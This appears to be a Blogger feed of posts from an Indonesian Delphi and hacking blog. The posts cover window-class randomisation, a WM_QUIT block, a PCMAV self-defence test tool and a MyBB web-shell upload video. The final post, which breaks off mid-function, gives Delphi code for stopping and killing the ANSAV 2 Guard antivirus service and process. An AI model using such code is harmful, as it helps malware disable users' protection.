tag:blogger.com,1999:blog-56765469434493358802011-11-17T18:04:03.605+07:00c0li.m0de.0nFeel the Power of LoveAndersonnoreply@blogger.comBlogger431100tag:blogger.com,1999:blog-5676546943449335880.post-78006517514461860752011-01-25T23:44:00.002+07:002011-01-25T23:47:43.536+07:00Create & Upload Shell via MyBB Admin CP [Video]<b>Create & Upload Shell via MyBB Admin CP</b><br /><br /><div class="separator" style="clear: both; text-align: left;"><a href="http://2.bp.blogspot.com/_3_FUVcKXdcE/TT79wBhoEYI/AAAAAAAAACw/RIqw_S0Zwls/s1600/mybb.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_3_FUVcKXdcE/TT79wBhoEYI/AAAAAAAAACw/RIqw_S0Zwls/s1600/mybb.gif" /></a></div><br /><br /><br /><br /><br /> <i>Tested On</i>: <b>MyBB v1.6.1</b><br /><br /><a href="http://www.mediafire.com/?5mjqx55fgm004h6" target="_blank">Download Video</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-7800651751446186075?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com1tag:blogger.com,1999:blog-5676546943449335880.post-49551212518850142392010-12-30T20:31:00.002+07:002010-12-30T20:39:59.708+07:00Anti WM_QUIT Message di Delphi 7<b>1</b>. Copy unit <b>Forms.pas</b> milik Delphi yang berada di dalam folder [DRIVE]:\Program Files\Borland\Delphi7\Source\ Vcl, kemudian Paste ke dalam folder Project anda.<br /><br /><b>2</b>. Edit function <b>TApplication.ProcessMessage(var Msg: TMsg): Boolean;</b> yang ada di baris ke <b>6856</b>.<br /><br />function TApplication.ProcessMessage(var Msg: TMsg): Boolean;<br />var<br /> Handled: Boolean;<br />begin<br /> Result := False;<br /> if PeekMessage(Msg, 0, 0, 0, PM_REMOVE) then<br /> begin<br /> Result := True;<br /> if Msg.Message <> WM_QUIT then<br /> begin<br /> Handled := False;<br /> if Assigned(FOnMessage) then FOnMessage(Msg, Handled);<br /> if not IsHintMsg(Msg) and not Handled and not IsMDIMsg(Msg) and<br /> not IsKeyMsg(Msg) and not IsDlgMsg(Msg) then<br /> begin<br /> TranslateMessage(Msg);<br /> DispatchMessage(Msg);<br /> end;<br /> end<br /> else<br /> FTerminate := False; { dari True menjadi False }<br /> end;<br />end;<br /><br />3. Masih bersama <b>Forms.pas</b> Buat atau Tambahkan Private Message baru sebagai pengganti WM_QUIT pada <b>procedure TApplication.WndProc(var Message: TMessage);</b><br /><br />Contoh nya seperti di bawah ini:<br /><br />6532: with Message do<br />6533: case Msg of<br />6534: WM_SYSCOMMAND:<br />[.....]<br />6669: WM_NULL:<br />6670: CheckSynchronize;<br />6671: WM_USER+666: { Ini Private Message Aplikasi Anda }<br />6672: FTerminate := True;<br />6673: else<br />6674: Default;<br />6675: end;<br /><br /><br />4. Dengan demikian perintah Application.Terminate sudah tidak bisa digunakan lagi, oleh karena itu anda perlu membuat procedure sendiri untuk menutup aplikasi anda.<br /><br /><b>Contoh</b>:<br /><br />procedure TForm1.CloseMe;<br />begin<br /> PostMessage(Application.Handle, WM_USER+666, 0, 0);<br />end;<br /><br />procedure TForm1.Button1Click(Sender: TObject);<br />begin<br /> CloseMe;<br />end;<br /><br /><br /><b>Sekian</b>.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-4955121251885014239?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-8413470198025657032010-12-30T20:22:00.002+07:002010-12-30T20:28:14.491+07:00Random ClassName Form (WindowClass) di Delphi 7<div style="text-align: left;"></div><div class="MsoNormal" style="text-align: left;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Random ClassName Form (WindowClass) di Delphi 7</span></b></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Saat ini sudah banyak Virus atau Worm buatan lokal (anak indonesia) yang menggunakan tehnik pertahanan diri dengan cara membunuh aplikasi-aplikasi yang dianggap berpotensi untuk menghentikan proses penyebarannya, salah satunya yaitu dengan cara melakukan <i>mass kill</i> terhadap semua proses yang dibuat dengan Delphi.</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Cara itu bisa dilakukan karena, secara default aplikasi VCL yang dibuat dengan Delphi akan diberikan <i>classname</i> atau nama <i>WindowClass</i> yang bersifat statik(?) dengan nama “<b>TApplication</b>” sebagai <i>Application ClassName</i> dan juga “<b>TPUtilWindow</b>” sebagai <i>Util Window ClassName</i> (penjelasan lebih lanjut silahkan googling xixixi).</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Berikut ini Penulis akan memberikan beberapa tip dan trik untuk menghindari <i>mass kill</i> yang dilakukan oleh virus/worm pada kasus di atas.</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Sebelum memulai, Tutup terlebih dahulu Delphi 7 nya kalau lagi aktif.</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">A.<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Random ClassName Application (TApplication)</span></b></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">1.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Buka text editor kesayangan anda (cth: notepad) lalu copy dan paste kode berikut ini dan save ke folder project anda dengan nama <b>RandomClass.pas</b></span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">{ BEGIN }</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">unit RandomClass;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">interface</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">uses</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> Windows;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">function RandomStr(Len:integer): String;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">implementation</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">function RandomStr(Len:integer): String;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">var</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> chars: string;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">begin</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> Randomize;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> chars := '1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> Result := '';</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> Len := Random(len);</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> if Len < 5 then Len := Len + 5;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> repeat</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> Result := Result + chars[Random(Length(chars)) + 1];</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> until (Length(Result) = Len);</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">end;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">end.</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">{ END }</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">2.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Copy unit <b>Forms.pas</b> milik Delphi yang berada di dalam folder [DRIVE]:\Program Files\Borland\Delphi7\Source\Vcl, kemudian Paste ke dalam folder Project anda.</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">3.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Buka <b>Forms.pas</b> tersebut dengan text editor lalu tambahkan unit <b>RandomClass</b> pada uses nya.</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">21: {$IFDEF MSWINDOWS}</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">22: uses Messages, Windows, SysUtils, Classes, Graphics, Menus, Controls, Imm,</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">23: ActnList, MultiMon, HelpIntfs, <span style="color: red;">RandomClass</span>;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">24: {$ENDIF}</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">4.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Masih pada <b>Forms.pas</b> Tambahkan kode berikut ini di bawah baris ke <b>6315 </b>yang ada pada <b>procedure TApplication.CreateHandle;</b></span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Kode:</span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> WindowClass.lpszClassName := PChar(RandomStr(10));</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Sehingga menjadi seperti berikut ini:</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">6315: {$ENDIF}</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="color: red; font-family: Verdana; font-size: 10pt;">6316: WindowClass.lpszClassName := PChar(RandomStr(10));</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">6317: WindowClass.lpfnWndProc := @DefWindowProc;</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">B.<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Random ClassName Util Window (TPUtilWindow)</span></b></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">1.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Copy unit <b>Classes.pas</b> milik Delphi yang berada di dalam folder [DRIVE]:\Program Files\Borland\Delphi7\Source\</span><span lang="IN"> </span><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Rtl\Common, kemudian Paste ke dalam folder Project anda.</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">2.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Buka <b>Classes.pas</b> tersebut dengan text editor lalu tambahkan unit <b>RandomClass</b> pada uses nya.</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">27: {$IFDEF MSWINDOWS}</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">28: uses Windows, Messages, SysUtils, Variants, TypInfo, ActiveX, <span style="color: red;">RandomClass</span>;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">29: {$ENDIF}</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">3.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Masih pada <b>Classes.pas </b>Tambahkan kode berikut ini di bawah baris ke <b>11042 </b>yang ada pada <b>function AllocateHWnd(Method: TWndMethod): HWND;</b></span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left; text-indent: 0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Kode:</span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> UtilWindowClass.lpszClassName := PChar(RandomStr(10));</span></div><div class="MsoNormal" style="text-align: left; text-indent: 0.25in;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Sehingga menjadi seperti berikut ini:</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">11042: {$ENDIF}</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="color: red; font-family: Verdana; font-size: 10pt;">11043: UtilWindowClass.lpszClassName := PChar(RandomStr(10));</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">11044: ClassRegistered := GetClassInfo(HInstance, UtilWindowClass.lpszClassName,</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">11045: TempClass);</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">C.<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Random ClassName Form</span></b></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">1.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Copy unit <b>Controls.pas</b> milik Delphi yang berada di dalam folder [DRIVE]:\Program Files\Borland\Delphi7\Source\</span><span lang="IN"> </span><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Vcl, kemudian Paste ke dalam folder Project anda.</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">2.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Buka <b>Controls.pas</b> tersebut dengan text editor lalu tambahkan unit <b>RandomClass</b> pada uses nya.</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">26: {$IFDEF MSWINDOWS}</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">27: Messages, Windows, MultiMon, Classes, SysUtils, Graphics, Menus, CommCtrl,</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">28: Imm, ImgList, ActnList, <span style="color: red;">RandomClass</span>;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">29: {$ENDIF}</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">3.<span style="font: 7pt "Times New Roman";"> </span></span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Masih pada <b>Controls.pas </b>Edit kode <b>StrPCopy(WinClassName, ClassName);</b> yang ada pada baris ke <b>5973 </b>di dalam <b>procedure TWinControl.CreateParams(var Params: TCreateParams);</b></span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Kode: </span></b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">StrPCopy(WinClassName, RandomStr(10));</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Sehingga menjadi seperti berikut ini:</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">5968: WindowClass.style := CS_VREDRAW + CS_HREDRAW + CS_DBLCLKS;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">5969: WindowClass.lpfnWndProc := @DefWindowProc;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">5970: WindowClass.hCursor := LoadCursor(0, IDC_ARROW);</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">5971: WindowClass.hbrBackground := 0;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">5972: WindowClass.hInstance := HInstance;</span></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left;"><span lang="IN" style="color: red; font-family: Verdana; font-size: 10pt;">5973: StrPCopy(WinClassName, RandomStr(10));</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="margin-left: 0.25in; text-align: left; text-indent: -0.25in;"><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">D.<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Random Caption Window/Form</span></b></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Tambahkan unit RandomClass pada uses Form1 (disesuaikan).</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">uses</span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,</span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"> Dialogs, <span style="color: red;">RandomClass</span>;</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Kemudian tambahkan kode berikut ini pada Event FormCreate.</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">procedure TForm1.FormCreate(Sender: TObject);</span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">begin</span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="color: red; font-family: Verdana; font-size: 10pt;"> Application.Title := RandomStr(30);</span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="color: red; font-family: Verdana; font-size: 10pt;"> Caption := RandomStr(50);</span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">end;</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">{ <b>sekian</b> }</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Jalankan Delphi 7 kemudian buka Project anda.</span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Compile Project dengan menekan Tombol CTRL+F9 (2x) lalu F9 (Run).</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Bagi yang hanya ingin mengganti TApplication atau TPUtilWindow tanpa menggunakan unit RandomClass, hanya perlu mengedit string pada baris-baris berikut ini:</span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">TApplication -> Forms.pas -> <b>Baris ke 6211: lpszClassName: 'TApplication');</b></span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">TPUtilWindow -> Classes.pas -> <b>Baris ke</b> <b>11032: lpszClassName: 'TPUtilWindow');</b></span></div><div class="MsoNormal" style="text-align: left;"><br /></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Semoga Tip Trik ini bisa berguna bagi anda terutama bagi mereka yang suka membuat antivirus maupun cleaner dengan Delphi.</span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;"><br /></span></div><div class="MsoNormal" style="text-align: left;"><span lang="IN" style="font-family: Verdana; font-size: 10pt;">Selamat Mencoba :)</span><span lang="IN" style="font-family: Wingdings; font-size: 10pt;"></span><span lang="IN" style="font-family: Verdana; font-size: 10pt;"></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-841347019802565703?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-29458845107490912302010-12-14T20:53:00.006+07:002010-12-14T21:25:27.460+07:00PCMAV 4.5 Ragnarok3 Self Defense TestBerbeda dengan versi² sebelum nya,<br />PCMAV 4.5 Ragnarok3 kali ini hadir dengan fitur "self defense",<br />seperti yang bisa dibaca di README nya:<br /><br />*****<br /><br />PC Media Antivirus (PCMAV) 4.5 - Ragnarok3<br />Copyright (c) 2006-2010 Majalah PC Media<br />Pinpoint Publications Group<br /><br />-------------------------<br />APA YANG BARU?/CHANGE-LOG<br />-------------------------<br />....<br />e. ADDED! Fitur self protection agar proses PCMAV tidak mudah dimatikan <br /> terutama oleh virus lokal.<br />....<br /><br />*****<br /><br /><div class="separator" style="clear: both; text-align: left;"><a href="http://3.bp.blogspot.com/_3_FUVcKXdcE/TQd2OIhExHI/AAAAAAAAACk/TyT9fOH0MdM/s1600/wew.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://3.bp.blogspot.com/_3_FUVcKXdcE/TQd2OIhExHI/AAAAAAAAACk/TyT9fOH0MdM/s320/wew.png" width="320" /></a></div><br /><br /><br /><br /><br /><br /><br /><br /><br />Dengan ada nya fitur ini tentunya akan memberikan nilai tambah bagi PCMAV sebagai<br />antivirus lokal indonesia yang paling banyak digunakan. (menurut penulis)<br /><br />Berikut ini adalah aplikasi sederhana yang sengaja penulis buat <br />menggunakan bahasa pemrogramman Delphi 7,<br />untuk mencoba "self defense" dari PCMAV 4.5 Ragnarok3.<br /><br /><div class="separator" style="clear: both; text-align: left;"><a href="http://2.bp.blogspot.com/_3_FUVcKXdcE/TQd2comoHYI/AAAAAAAAACo/igq-9VdL8xE/s1600/wow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://2.bp.blogspot.com/_3_FUVcKXdcE/TQd2comoHYI/AAAAAAAAACo/igq-9VdL8xE/s320/wow.png" width="320" /></a></div><br /><br /><br /><br /><br /><br /><br /><br /><br />Silahkan didownload dan dicoba sendiri:<br /><a href="http://www.mediafire.com/download.php?2bmmom8j46jwhml" target="_blank">DOWNLOAD</a><br /><br />Note:<br />*) Matikan sementara Guard Avira sebelum mencoba nya.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-2945884510749091230?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-15197819651790689502010-12-12T20:51:00.004+07:002010-12-14T21:29:15.363+07:00Stop dan Kill ANSAV 2 Guard dengan Delphi<b>Langsung saja ...</b><br /><br />{ .....Begin }<br /><br /><b>uses WinSvc, TlHelp32;</b><br /><br /><b>function StopService(sMachine,sService:string):boolean;</b><br />var<br /> SCHMan, SCHSrv: SC_Handle;<br /> SrvStatus: TServiceStatus;<br /> dwCP: DWord;<br />begin<br /> SCHMan := OpenSCManager(PChar(sMachine),Nil,SC_MANAGER_CONNECT);<br /> if (SCHMan > 0) then<br /> begin<br /> SCHSrv := OpenService(SCHMan,PChar(sService),SERVICE_STOP or SERVICE_QUERY_STATUS);<br /> if (SCHSrv > 0) then<br /> begin<br /> if (ControlService(SCHSrv,SERVICE_CONTROL_STOP,SrvStatus)) then<br /> begin<br /> if (QueryServiceStatus(SCHSrv,SrvStatus)) then<br /> begin<br /> while(SERVICE_STOPPED <> SrvStatus.dwCurrentState) do<br /> begin<br /> Application.ProcessMessages;<br /> StopService(sMachine,sService);<br /> dwCP := SrvStatus.dwCheckPoint;<br /> Sleep(SrvStatus.dwWaitHint);<br /> if (not QueryServiceStatus(SCHSrv,SrvStatus)) then break;<br /> if(SrvStatus.dwCheckPoint < dwCP)then break;<br /> end;<br /> end;<br /> end;<br /> CloseServiceHandle(SCHSrv);<br /> end;<br /> CloseServiceHandle(SCHMan);<br /> end;<br /> Result := SERVICE_STOPPED = SrvStatus.dwCurrentState;<br />end;<br /><br /><b>function KillProcByFileName(FileName:string;ExitCode:integer):integer;</b><br />const<br /> PROCESS_TERMINATE = $0001;<br />var<br /> Loop: BOOL;<br /> FSHnd: THandle;<br /> FPE32: TProcessEntry32;<br />begin<br /> Result := 0;<br /> FSHnd := 